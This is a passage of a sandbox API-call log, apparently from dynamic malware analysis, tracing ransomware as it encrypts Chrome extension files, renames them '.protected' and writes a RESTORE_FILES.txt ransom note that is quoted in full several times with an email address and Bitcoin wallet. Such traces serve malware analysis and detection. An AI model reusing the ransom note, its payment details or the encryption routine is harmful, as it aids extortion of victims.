lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.394] CloseHandle (hObject=0x168) returned 1 [0081.394] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.protected") returned 165 [0081.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.protected")) returned 1 [0081.395] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.395] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.395] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\RESTORE_FILES.txt") returned 159 [0081.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.395] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.395] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.396] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.396] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.396] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.396] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.396] CloseHandle (hObject=0x164) returned 1 [0081.396] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.396] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0081.397] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0081.397] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0081.397] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0081.397] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0081.397] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es") returned 141 [0081.397] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0081.397] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0081.397] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*") returned 143 [0081.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.397] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.397] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.397] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.397] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.397] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.397] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\.") returned 143 [0081.397] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.397] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.397] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.397] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.397] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.397] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.397] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.397] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\..") returned 144 [0081.397] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.397] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.397] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.397] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.398] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0081.398] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.398] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0081.399] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0081.399] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0081.399] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.399] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10d, lpOverlapped=0x0) returned 1 [0081.400] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.400] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10d, lpOverlapped=0x0) returned 1 [0081.400] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.400] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.400] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.400] CloseHandle (hObject=0x168) returned 1 [0081.401] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.protected") returned 165 [0081.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.protected")) returned 1 [0081.401] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.401] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.401] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0081.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.402] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.402] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.403] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.403] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.403] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.403] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.403] CloseHandle (hObject=0x164) returned 1 [0081.403] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0081.404] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi") returned 141 [0081.404] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0081.404] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0081.404] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*") returned 143 [0081.404] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.405] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.405] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.405] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.405] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.405] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.405] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\.") returned 143 [0081.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.405] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.405] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.405] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.405] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.405] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.405] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.405] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\..") returned 144 [0081.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.405] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.405] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0081.405] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.405] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0081.407] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0081.407] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0081.407] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.407] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.408] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.408] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.408] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.408] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.408] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.408] CloseHandle (hObject=0x168) returned 1 [0081.408] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.protected") returned 165 [0081.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 